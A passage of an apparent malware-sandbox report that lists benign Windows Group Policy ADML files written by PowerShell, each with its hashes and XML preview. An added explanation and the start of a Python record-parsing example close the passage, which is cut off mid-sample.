                                                                                                                                                                                                        SSDEEP:96:LeD5pmaMIjP+dQzot5fZeuGnu9rAEQNsVS3sYgovZ4v/4euVuY9+UDVxgACCmskc:Ep8QzgfZeu1905teYUANOKIk
                                                                                                                                                                                                        MD5:7783B0D4B182BE9230A649D6E8DC56AD
                                                                                                                                                                                                        SHA1:215263A87F861BD2D8263BAD8011C5DDA0357BEB
                                                                                                                                                                                                        SHA-256:DB2F6E21FDB453CD8E67C278038547D12EB5C58C1D0280776670D618AEDED64F
                                                                                                                                                                                                        SHA-512:1B13DB33C12191ECF4687C6DEAF76E4776A10AAB045150C2A85369B0AA5553ECF42524A585A2A33905D1B124C1108FF2CACCDFE9C86D8CBBA89FD37E37F8D996
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>KDC Settings</displayName>.. <description>Configuration settings for the Kerberos Key Distribution Center.</description>.. <resources>.. <stringTable>.. <string id="KDC">KDC</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Key Distribution Center (KDC) searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the KDC will search the forests in this list if it is unable to resolve a two-part SPN in the local forest. The forest search is performed by using a glo
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (840), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19138
                                                                                                                                                                                                        Entropy (8bit):4.73754316262114
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:7atR7siAzz45FWuozQV/hI+DklrjMvJK1ORt:ebksWnzkhI19OL
                                                                                                                                                                                                        MD5:AA29F707B1FE528F5F856EC64E771DAC
                                                                                                                                                                                                        SHA1:6F3F897807668918B8A6F7C4E78B17AA445070F9
                                                                                                                                                                                                        SHA-256:4148DF3125629ABE00141FACEF7519BBDE4D3877067A234F35C0A63B740810F6
                                                                                                                                                                                                        SHA-512:4281194C43BF70E7839FF63107549994D8C89D211317E30557B366C32E30F58505F91AD17E8073869579C6EADA056D8973CD25A489D929FAF796CAE42F5A874E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Kerberos Settings</displayName>.. <description>Configuration settings for the Kerberos authentication protocol.</description>.. <resources>.. <stringTable>.. <string id="kerberos">Kerberos</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Kerberos client searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the Kerberos client searches the forests in this list, if it is unable to resolve a two-part SPN. If a match is found, the Kerberos client requests a re
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6322
                                                                                                                                                                                                        Entropy (8bit):4.728370721511469
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm8qDY/ixB4w28Divg6JR+CfREEM2eYJk2y3XTE68TpwQEOgRVLTMV:E9iUw2c0rUEk2yTEZpBmLg
                                                                                                                                                                                                        MD5:33F09CDADA6D62BAE3F0DC0A3E1A2C2A
                                                                                                                                                                                                        SHA1:62BEEE0D918637A68746741C74244FCF39D1A3FB
                                                                                                                                                                                                        SHA-256:3393D80184E3C251A2E8249C13BBBE99A9045AD37550D8497D960371964BF8B7
                                                                                                                                                                                                        SHA-512:DE12FA4C934B9A56C86FF7405D3DEBE1D8F3B4AB3ACDD419888FF2399FEDCABC42CFAF26EDA458C0B874D052327B1DC7BE8C454AA4DE0CF7C920F590C40C5BF0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_LanmanServer">Lanman Server</string>.. <string id="Lbl_FollowShare">Allow hash publication only for shared folders on which BranchCache is enabled</string>.. <string id="Lbl_DisableOnAllShares">Disallow hash publication on all shared folders</string>.. <string id="Lbl_EnableOnAllShares">Allow hash publication for all shared folders</string>.. <string id="Pol_HashPublication">Hash Publication for BranchCache</string>.. <string id="Pol_HashPublication_Help">This policy setting specifies w
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1590
                                                                                                                                                                                                        Entropy (8bit):4.91680451974178
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKbXSr4eKUsXZ3W5/1n0BsIvFV:LeD5pmnCr4QCW1hCsIvFV
                                                                                                                                                                                                        MD5:FAB2C03A061CF266E4BF99D9AD8410CC
                                                                                                                                                                                                        SHA1:62C30ED88810E558C2C5B29DF833E0B84979F798
                                                                                                                                                                                                        SHA-256:1FAD47D1BCFC5110370B1E428F800DD67B65037C2C029C39355D1F0AF51B4712
                                                                                                                                                                                                        SHA-512:2B49196BE14CD1493F98BB4294D50CE42481D67A02357FD6F26067588B4D19B96D7D6677E5A3B6DA5A99329B7422BD5C257C591CBD6C773E5A106EE47E6A2909
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Memory Leak Diagnosis</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines whether Diagnostic Policy Service (DPS) diagnoses memory leak problems.....If you enable or do not configure this policy setting, the DPS enables Windows Memory Leak Diagnosis by default.....If you disable this policy setting, the DPS is not able to diagnose memory leak problems.....
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (460), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3646
                                                                                                                                                                                                        Entropy (8bit):4.907043755326407
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKIZNW4D5Drf3R5SMxeHJ/LLXdMD5ebqKrf3R5SfxeHJ/LLgX3jqS0:LeD5pmON3ljPep+sqajiep4X3jqSGvV
                                                                                                                                                                                                        MD5:92DBAD98F0E768C7BFE966BD839BB017
                                                                                                                                                                                                        SHA1:DE0047F6E6C1A639102804F0D9081783488BB331
                                                                                                                                                                                                        SHA-256:14DAFF44ECBEC76CDE21CCC68D5558BD6119A5F58C6884B9692B6341EAD643DD
                                                                                                                                                                                                        SHA-512:F74CAACA0D2CE8E4E8702E83E6F077C6BC17BC69CF2BE40698227FE003A7C1291F22D49CB3FEB50A8D418C1083EAE6767474F21AAC7F83A40620F6B461611723
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="LLTD_Category">Link-Layer Topology Discovery</string>.. <string id="LLTD_Category_Help">Configures all Link-Layer Topology Discovery components.</string>.. <string id="LLTD_EnableLLTDIO">Turn on Mapper I/O (LLTDIO) driver</string>.. <string id="LLTD_EnableLLTDIO_Help">This policy setting changes the operational behavior of the Mapper I/O network protocol driver.....LLTDIO allows a computer to discover the topology of a network it's connected to. It also allows a computer to initiate Quality-of-Servic
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1212
                                                                                                                                                                                                        Entropy (8bit):4.9162916170648305
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yYr2XjEEgr2WMb/fLqI2LHIQIeQLUgH7IYLjXr2cE5n:cgeD5x8gm8fKBqTETqRXLqbLoQWLUgbU
                                                                                                                                                                                                        MD5:FE47798FE9B3F4C43E782DF1AF166A87
                                                                                                                                                                                                        SHA1:909EE6F13A9F43305857C64DF1F2B8C91797A60B
                                                                                                                                                                                                        SHA-256:F4EDEF9970D1E3EE016E880537DB88D7B6A3B5ABD142D791FC39D39FC4E1FFA9
                                                                                                                                                                                                        SHA-512:3487FA625323C52C6BB52C09051CE0C5E41A1EAB45448C5471B2378DFDF6E478DF36E3424F08946B6F1C516E795E138CC87166DF81B4D463B5E04166949FE14E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableWindowsLocationProvider">Turn off Windows Location Provider</string>.. <string id="DisableWindowsLocationProvider_Explain">.. This policy setting turns off the Windows Location Provider feature for this computer..... If you enable this policy setting, the Windows Location Provider feature will be turned off, and all programs on this computer will not be able to use the Windows Location Provider feature..... If you disable or do not configure this policy setting, all programs on this
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (587), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16832
                                                                                                                                                                                                        Entropy (8bit):4.631442685712746
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:HD5n9zbzDznNtlY2iFwIcnBJGciF7BZXmhdtP0:nzbzDzn9YPJMGcitzmx0
                                                                                                                                                                                                        MD5:7DEB6528B7BF721DA0BC53B65116E4B2
                                                                                                                                                                                                        SHA1:999291B1970366D2256B0081EBE8420E6519D13E
                                                                                                                                                                                                        SHA-256:CFF8BFAD325C4F3BE418A491D37BB367E126F24EE22FA39C809C83AED6C07033
                                                                                                                                                                                                        SHA-512:BC22B74FF1FEA301961650160914422A5A986B7082C27140817E8ABE0E2720CB9578B8EF637182CBAE5CB7E3AC8481F4E334A815645E3F13A82163A7941FEC61
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="UseOEMBackground">Always use custom logon background</string> .. <string id="UseOEMBackground_Help">This policy setting ignores Windows Logon Background.....This policy setting may be used to make Windows give preference to a custom logon background. ....If you enable this policy setting, the logon screen always attempts to load a custom background instead of the Windows-branded logon background. ....If you disable or do not configure this policy setting, Windows uses the default Windows logon background or cu
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (374), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4806
                                                                                                                                                                                                        Entropy (8bit):4.701920186548574
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmQsFOr1sf4h/p1IXr5KQ6A735FlZ+HQsvYxyOsFV:EsFOriforIkQ6A7zlZ+HvvYxyOsn
                                                                                                                                                                                                        MD5:E7286B16AB9A79A941457D0E5F7AC2D9
                                                                                                                                                                                                        SHA1:7E41AA47B450F332DAC6A9AEE8B1021397ACC90F
                                                                                                                                                                                                        SHA-256:5CE95BDC6780550FAD262390A824CDB07D6B426683FE1E8AFA533D6A47A8E79B
                                                                                                                                                                                                        SHA-512:5BCDA870EF7DCEDA95D4C44B8EDB9DB08BB937D5D5FB07601DE231BA21C7B7902A8D74F6A33352132C0F5D2E84C47E9AE855290444B76EDD6A59792BD8BD67C2
                                                                                                                                                                                                        Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC">Microsoft Management Console</string>.. <string id="MMC_ActiveXControl">ActiveX Control</string>.. <string id="MMC_ExtendView">Extended View (Web View)</string>.. <string id="MMC_ExtensionSnapins">Extension snap-ins</string>.. <string id="MMC_LinkToWeb">Link to Web Address</string>.. <string id="MMC_RESTRICT">Restricted/Permitted snap-ins</string>.. <string id="MMC_Restrict_Author">Restrict the user from entering author mode</string>.. <string id="MMC_restrict_Author_Explain"

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (332), with CRLF line terminators
Category:dropped
Size (bytes):3258
Entropy (8bit):4.817177716053599
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKqgONUGM7MG1T7yvG/sFO3hsFaSb7AqIAF9dFpgJcJTU8OiFQBeQs:LeD5pmnGCpZ7r/sFgsFaK735Sf/cMeFV
MD5:181EDEAB7F0FA1FD7DA1D157121386D1
SHA1:B4F9B4B91FD9D8EFA327E20516DE975892A706F1
SHA-256:258D9502CBD3B2B6E342D1B705A17A6537865D066BEC2227BD4BD5A4D3E411F9
SHA-512:99FF5FD5A9E50F1AE843845CC54E616F73DE24270261496087E902AB5AAA286ED9C9A19DCB230857774834DF20AAA2056D052D905F12ACBB338C845BFE8D1B9D
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_StorageManagerForSANSSnapIn">Storage Manager for SANs</string>.. <string id="MMC_StorageManagerForSANSSnapInExtension">Storage Manager for SANS Extension</string>.. <string id="MMC_FileServerResourceManagerSnapIn">File Server Resource Manager</string>.. <string id="MMC_FileServerResourceManagerSnapInExtension">File Server Resource Manager Extension</string>.. <string id="MMC_DiskManagementSnapInExtension">Disk Management Extension</string>.. <string id="MMC_DFSSnapIn">DFS Management</st

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
Category:dropped
Size (bytes):10156
Entropy (8bit):4.902850417863983
Encrypted:false
SSDEEP:192:Eha8zqIFaazk71nt3xuH+6gqb7UFfFaK7Oz/cExtqRACAmn:u2IFWke6gqHBcR9r
MD5:A30AB3FB1BA97BFD3AD477AD18D0BE28
SHA1:9175E307ED491957EEB303BC6BEB8F6ABB2EB0FB
SHA-256:48663270C2B2ED9475692772CBF5B12B635D75FA293E3059F8B81D8B4D02382E
SHA-512:13DD57C61196B2DAC93F8C4FF602ACEA6644B4DEA08FF96B2770C50EC98CE73A9F9C3CEA3BF29ED7A3E5089474F27653BFBBDFC515FB378965D107DDA252BF0D
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_ActiveDirDomTrusts">Active Directory Domains and Trusts</string>.. <string id="MMC_ActiveDirSitesServices">Active Directory Sites and Services</string>.. <string id="MMC_ActiveDirUsersComp">Active Directory Users and Computers</string>.. <string id="MMC_ADMComputers">Administrative Templates (Computers)</string>.. <string id="MMC_ADMUsers">Administrative Templates (Users)</string>.. <string id="MMC_ADSI">ADSI Edit</string>.. <string id="MMC_AppleTalkRouting">AppleTalk Routing</stri

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4822
Entropy (8bit):4.7368864262977635
Encrypted:false
SSDEEP:96:LeD5pmtzIVVV78jVqaqGCs1HVVpLg2uw+F8c6mqSaM17CsQe2ce9e2bgzKDB2QSV:EL8jVqaTpCwSfqSaQpQe2c8e2SuS3l
MD5:CD6F4B94C65A6A5F650EEDCC4108C1F9
SHA1:BB95196861D768DE33C1A574CD3C3B05DE281B8B
SHA-256:91692970671C4A0AC5A872A787F7C8D5B7C69BC36503D2815408443EA7B820DB
SHA-512:41E53997E7FE19552B50DAE9B3E9DDC61289B69DFBD05A837A05E023D67B103DE17BC794CA897BB69DB59CBA6564471C26AD9B0C31811065E98C2270B1D67D5E
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Microsoft Support Diagnostic Tool</string>.. <string id="WdiScenarioExecutionPolicy">Microsoft Support Diagnostic Tool: Configure execution level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines the execution level for Microsoft Support Diagnostic Tool.....Microsoft Support Diagnostic Tool (MSDT) gathers diagnostic data for analysis by support professionals.....If you enable this policy setting, administrators can use MSDT to collect and send di

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (499), with CRLF line terminators
Category:dropped
Size (bytes):30569
Entropy (8bit):4.629506484487412
Encrypted:false
SSDEEP:384:S3fWPIaG5EBoj8lK1I8DBkpkBLNPn4WCMIb53woYlHMwIxTQMNBN2wJKPCoz1Nqb:7wI8DhTSb53w/4DRb
MD5:281E7FFCCBCB02FC616FEBF6F291B411
SHA1:EB918DDA656626758F3B4B993C12CB04BA7F18E3
SHA-256:BEA0490CA9E830B84869A273D0011683A54FA4E92E0EFF63B9F123CFFFC40C60
SHA-512:6C932E4F13F9FE7C0C38A92C85808138C8ACB0CA925A8B5B149CA3C0F081B90112C52A165E37DEB5A400E300386108A9CC8D8F75D68D697798E34B40325E270A
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowLockdownBrowse">Allow users to browse for source while elevated</string>.. <string id="AllowLockdownBrowse_Help">This policy setting allows users to search for installation files during privileged installations.....If you enable this policy setting, the Browse button in the "Use feature from" dialog box is enabled. As a result, users can search for installation files even when the installation program is running with elevated system privileges.....Because the installation is running with elevated system p

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1133
Entropy (8bit):4.94325326862628
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yDIuQF6FVMFV:cgeD5x8gm8fKbyqFV
MD5:7EFC78CEE6A256186F169D12466F667D
SHA1:C190C0FAB77A5095D595ED65CF1E0ADF81A9AE7E
SHA-256:DD91079C05795BD2BBA3C3F0A7167A5B8760A540C2E3000F379D4058D2E67258
SHA-512:B5A90208C5A69F90DB1F7C90B161E066FFDFF2761BECC314D1611709EFE31848D250A45EFFBF60356E71C00370A99252CE8D4ECB804683575528F5E6FCE7432A
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MediaCenter">Windows Media Center</string>.. <string id="MediaCenter_Disable">Do not allow Windows Media Center to run</string>.. <string id="MediaCenter_Disable_Help">This policy setting allows or prevents Windows Media Center to run.....Windows Media Center is a digital media player and video recorder that allows users to organize and play music and videos, and to view and record live television.....If you enable this policy setting, Windows Media Center will not run.....If you disable or do not configu

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1205
Entropy (8bit):4.9534177597350935
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yLwjaMb3zjS/RmN3FooRFV:cgeD5x8gm8fKkqaM3a/RmNqAFV
MD5:F4ED8285AC3F6D33796ECEB5A7D654D7
SHA1:8856483D9DE028B8ADED5807E7F786E61BA9A969
SHA-256:94D9C7AAF148F31B6129B5567F963832427DE828DCD7E0B31F1BCBDBD5DBED3C
SHA-512:6B7A56459CCC4DDE7A3EE144334295653B394D5D6499E98FC0184244D6FE4B3BE38324492378EA88C4851133678287CD4C5381120F83488AE639279CBFC8A328
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MobilityCenterCat">Windows Mobility Center</string>.. <string id="MobilityCenterEnable">Turn off Windows Mobility Center</string>.. <string id="MobilityCenterEnableExplain">This policy setting turns off Windows Mobility Center.....If you enable this policy setting, the user is unable to invoke Windows Mobility Center. The Windows Mobility Center UI is removed from all shell entry points and the .exe file does not launch it.....If you disable this policy setting, the user is able to invoke Windows Mobility

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
Category:dropped
Size (bytes):1482
Entropy (8bit):4.847847941024891
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ycjpb3BnEndr90fFV:cgeD5x8gm8fKrV3Bn2RSfFV
MD5:3D1BC388407E64D128728E5259ADAC99
SHA1:AAF0BD72A00F01936A1B8CFF0DD9F43B4A5DEB06
SHA-256:EC7D1B396B99416F267F99BA8D7A81199284C01CAE1A19081F2670233FA02F20
SHA-512:68A27081AA8ABEAECED75720102C4712FCBFB0BF77918A8C47C62BA0EC4FA0F369DD605A91AF0B671DC079053F0A1328B6F5DBA9A0623E8B03095FCB65F6D83C
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PresentationSettingsCat">Presentation Settings</string>.. <string id="PresentationSettingsEnable">Turn off Windows presentation settings</string>.. <string id="PresentationSettingsEnableExplain">This policy setting turns off Windows presentation settings.....If you enable this policy setting, Windows presentation settings cannot be invoked.....If you disable this policy setting, Windows presentation settings can be invoked. The presentation settings icon will be displayed in the notification area. This wi

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
Category:dropped
Size (bytes):3082
Entropy (8bit):4.810214089047188
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKyxgteEKvv4NYlVOdX71JDerq5x0BsYu9tP4XEgV:LeD5pmHWwua5PD2qjCsNtPeV
MD5:DA778ED24DE53EF1BAF75408032E34A8
SHA1:20B3E050E4094CDEA1765EFA73AE92DADF4D3F18
SHA-256:1FA3057260F8642ADAF7C30D68CBDF5703BCBE983ACBEB0335FD31347D8CE4CB
SHA-512:393A383F1CA87036A1893150514276B1277816CDAAC1704891D0345C1464D53B22C0ACD752EAF4B130EA8E3C40C3B4AC86FDADBBCD2F792414E79575C746BD82
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">MSI Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure MSI Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted MSI files to one of three states:....Prompt for Resolution: Detection, troubleshooting, and recovery of corrupted MSI applications will be turned on. Windows will prompt the user with a dialog box when application reinstallat
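Every dropped-file entry in this run of the report is written by powershell.exe, is typed as an XML document whose preview opens a Group Policy policyDefinitionResources string table, and carries Malicious:false; these are ADML resource files, not the stealer payload, and an analyst working through the report wants to skip them quickly and concentrate on anything that does not fit that pattern. As an added example (my own code, not part of the Joe Sandbox report), the Python below parses rows in this Key:Value layout into records, checks that each hash field has the length and hex alphabet its algorithm requires, and labels each record so the ADML noise can be set aside. The labels, function names and the embedded sample are assumptions of this example; the two sample records are copied from this section with their previews cut short.

```python
import re
from collections import Counter

# Two dropped-file records copied from this report, leading whitespace kept
# and the Preview field cut short: constructed sample input for the parser.
SAMPLE = r"""
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
    Category:dropped
    Size (bytes):10156
    Entropy (8bit):4.902850417863983
    Encrypted:false
    SSDEEP:192:Eha8zqIFaazk71nt3xuH+6gqb7UFfFaK7Oz/cExtqRACAmn:u2IFWke6gqHBcR9r
    MD5:A30AB3FB1BA97BFD3AD477AD18D0BE28
    SHA1:9175E307ED491957EEB303BC6BEB8F6ABB2EB0FB
    SHA-256:48663270C2B2ED9475692772CBF5B12B635D75FA293E3059F8B81D8B4D02382E
    SHA-512:13DD57C61196B2DAC93F8C4FF602ACEA6644B4DEA08FF96B2770C50EC98CE73A9F9C3CEA3BF29ED7A3E5089474F27653BFBBDFC515FB378965D107DDA252BF0D
    Malicious:false
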